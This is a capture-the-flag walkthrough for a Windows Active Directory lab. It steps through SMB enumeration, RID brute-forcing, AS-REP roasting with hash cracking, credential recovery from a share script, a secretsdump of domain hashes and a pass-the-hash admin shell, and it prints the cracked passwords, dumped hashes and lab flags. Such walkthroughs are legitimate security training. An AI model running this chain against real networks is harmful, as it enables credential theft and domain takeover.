ROASTED

https://tryhackme.com/room/vulnnetroasted

Walkthrough for "VulnNet: Roasted"

Operating System: Windows

Recon

nmap-auto $TARGET all

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-20 21:31:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp  open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf     .NET Message Framing
49665/tcp open  msrpc      Microsoft Windows RPC
49667/tcp open  msrpc      Microsoft Windows RPC
49669/tcp open  msrpc      Microsoft Windows RPC
49670/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc      Microsoft Windows RPC
49688/tcp open  msrpc      Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

There is a lot of information here, here are some of the key takeaways:

Port 139/445 > Samba service active
Port 88 > Microsoft Windows Kerberos
Port 389/3268 > Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)

Enumeration

SMB

Checking SMB first as the obvious choice, listing out the shares shows:

smbclient -L $TARGET -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
	VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
	VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing

The following shares are accessible and have content that can be pulled and read:

smbclient //$TARGET/VulnNet-Business-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 12 18:46:40 2021
  ..                                  D        0  Fri Mar 12 18:46:40 2021
  Business-Manager.txt                A      758  Thu Mar 11 17:24:34 2021
  Business-Sections.txt               A      654  Thu Mar 11 17:24:34 2021
  Business-Tracking.txt               A      471  Thu Mar 11 17:24:34 2021
  
smbclient //$TARGET/VulnNet-Enterprise-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Mar 12 18:46:40 2021
  ..                                  D        0  Fri Mar 12 18:46:40 2021
  Enterprise-Operations.txt           A      467  Thu Mar 11 17:24:34 2021
  Enterprise-Safety.txt               A      503  Thu Mar 11 17:24:34 2021
  Enterprise-Sync.txt                 A      496  Thu Mar 11 17:24:34 2021

Reading these files shows a plethora of useful information, primarily user information. The tool crackmapexec, which is used to collect active directory information, can be used to get further information on usernames with the following command:

crackmapexec smb $TARGET -u 'guest' -p '' --rid-brute
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Old configuration file detected, replacing with new version
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\guest: 
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  [+] Brute forcing RIDs
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  500: VULNNET-RST\Administrator (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  501: VULNNET-RST\Guest (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  502: VULNNET-RST\krbtgt (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  512: VULNNET-RST\Domain Admins (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  513: VULNNET-RST\Domain Users (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  514: VULNNET-RST\Domain Guests (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  515: VULNNET-RST\Domain Computers (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  516: VULNNET-RST\Domain Controllers (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  517: VULNNET-RST\Cert Publishers (SidTypeAlias)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  518: VULNNET-RST\Schema Admins (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  525: VULNNET-RST\Protected Users (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  526: VULNNET-RST\Key Admins (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1105: VULNNET-RST\a-whitehat (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1109: VULNNET-RST\t-skid (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1110: VULNNET-RST\j-goldenhand (SidTypeUser)
SMB         10.10.172.108   445    WIN-2BO8M1OE1M1  1111: VULNNET-RST\j-leet (SidTypeUser)

Alexa Whitehat: a-whitehat
Jack Goldenhand: j-goldenhand
Tony Skid: t-skid
Johnny Leet: j-leet

These usernames along with the other users could be used to try to make a userlist to do further enumeration or exploitation with:

a-whitehat
j-goldenhand
t-skid
j-leet
enterprise-core-vn
krbtgt
Guest
Administrator
WIN-2BO8M1OE1M1$

Another tool that can be used to do the same thing is Impackets' lookupsid.py module:

lookupsid.py -no-pass anonymous@$TARGET

Kerberos

Since I have crafted a list of possible usernames and there is an open Kerberos service, I can attempt to conduct "Kerberoasting", an attack method for cracking hashes for service accounts in active directory. This will attempt to get tickets from the Domain Controller, and crack them using a tool like hashcat or johntheripper to get the actual passwords.

Using Impacket, an open source tool installed on Kali, I can use modules like GetUserSPNs or GetNPUsers to try to get some ticket responses, the first requiring a password and the latter not requiring one. The module GetNPUsers is for ASREPRoast, which is used to crack user passwords if a user has the DONT_REQ_PREAUTH attribute which allows the KDC to respond with KRB_AS_REP user hashes even without a password.

GetNPUsers.py -format hashcat -usersfile roasted_users.txt --outputfile hash-hashcat.txt --ou-dc-ip $TARGET vulnnet-rst/
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:ac09439c236620b9bc13c6b0c570c4b3$0493b49742538cc119ea4aaa99dec306f5dbd250867dd4804b3c0f39e6e916e4fee31ae087e13e34237064797307de308c0ef51292f8031ba0a79ec803232a597b316b051725402f2fc84eb875d283504fa086fddc8a66642f5c5b4cdae192d2b2cae954b4ba77f01c5aac49b2386e3f46ec4be702f25453ca0517ddb4e2e4c14298b12d5e4428b5d9d4021672874b47bf2930a231eafd0c330ddcbca39a9867a61b7b475ca8d57c2004ae9da701a50292305a7d408a0dba1d99d1a77cbe9746645f868e7455d9230685113d3f17a4f5d82044656018090f1d1a8376115d67d19f6613ecc23b5150228811133e859a04
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set

The user "t-skid" returned a TGT hash which can then be cracked in hashcat. Using the command hashcat -h | grep -i "kerberos" shows a number of options, the correct one is "18200 | Kerberos 5, etype 23, AS-REP"

$krb5asrep$23$t-skid@VULNNET-RST:2ddeae72929e28ddf0f36acd8f8bf6c8$d7d738c5c2deacf52344e8c31730942437d1c1817b57b4b4f9cd2ff371111ff4974db7f00c3f3170325e9e7ec809f77c05be8249ce64bdd672caca2a52b4f1dd3e28da309ba155d2bfdeb228948425267a99090d35ceda6e531f13f1875cbafa26a82aad24af772ba56c254dd606ea99e05731d17f4bbd5dedd1eef4399d3a2fabe656f080eb7152da56ee1134dc6493231ddb72998f2cec51df57399e2aeee55e51992e00ef4d0f4d21f6cba51a140c32097beec8d107536fad8a7611f0dc324cf32f9598327591f726fb85edd6d1d9731305c3853bf3d6fb93fe6d29b95b8550ffef12dad42ce5cb275915be623f68

Use the following command to crack the hash:

sudo hashcat -m 18200 -a 0 hash-hashcat.txt $ROCKYOU

This gives the password for user t-skid: tj072889*

Username: t-skid

Password: tj072889*

Exploitation

After getting the initial credentials, I tried to enumerate other shares that were previously blocked. The share NETLOGON was accessible this time and contained a file called ResetPassword.vbs. The following commands worked to login and retrieve the file:

smbclient //$TARGET/NETLOGON -U t-skid
Password for [WORKGROUP\t-skid]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar 16 16:15:49 2021
  ..                                  D        0  Tue Mar 16 16:15:49 2021
  ResetPassword.vbs                   A     2821  Tue Mar 16 16:18:14 2021

		8771839 blocks of size 4096. 4534166 blocks available
smb: \> get ResetPassword.vbs 
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)

The retrieved file shows the following:

ResetPassword.vbs

Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName

In the beginning of the script are the credentials for user a-whitehat:

Username: a-whitehat

Password: bNdKVkjv3RR9ht

User a-whitehat actually has privileges to do a number of things including read and write to the ADMIN$ share. This can be shown through the following command:

smbmap -H $TARGET -u a-whitehat -p bNdKVkjv3RR9ht

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[\] Auth[!] Unable to remove test file at \\10.10.188.205\SYSVOL\PYSIOUGRJG.txt, please remove manually
                                                                                                    
[+] IP: 10.10.188.205:445	Name: 10.10.188.205       	Status: ADMIN!!!   	
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	READ, WRITE	Remote Admin
	C$                                                	READ, WRITE	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ, WRITE	Logon server share 
	SYSVOL                                            	READ, WRITE	Logon server share 
	VulnNet-Business-Anonymous                        	READ ONLY	VulnNet Business Sharing
	VulnNet-Enterprise-Anonymous                      	READ ONLY	VulnNet Enterprise Sharing

Logging into the ADMIN$ share and navigating to the \Users\enterprise-core-vn\Desktop\ path shows the user flag user.txt.

user.txt: THM{726b7c0baaac1455d05c827b5561f4ed}

Privilege Escalation

Trying to print out the system flag from here straight out failed due to an "Access Denied" prompt. No worries, since user a-whitehat has write access to SMB an an administrator, it's possible to use the Impacket module secretsdump to get the SAM hashes. These hashes could potentially be used to get a shell on the box.

secretsdump.py vulnnet-rst/a-whitehat:bNdKVkjv3RR9ht@$TARGET
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:b29bcd4a0cbf3f4661e3441ecce96db5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:54c1fcdbe4b883e52e3008ca027bbc06fb69be39535b5f8f1112d6ab11937bf0
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:e06812ec14e5b3d29f7823aa292dee0f
WIN-2BO8M1OE1M1$:des-cbc-md5:92da58ef759ee046

The NTHash of the Administrator is the fourth section under the "Dumping local SAM hashes". This can be used with the tool evil-winrm, a powerful shell creator utilizing Windows Remote Management, to gain an administrator shell

evil-winrm -i $TARGET -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator

Navigating to C:\Users\Administrator\Desktop can find the system.txt flag!

system.txt: THM{16f45e3934293a57645f8d7bf71d8d4c}

PreviousPOSTEXPLOIT NextTEMPEST

Last updated 1 year ago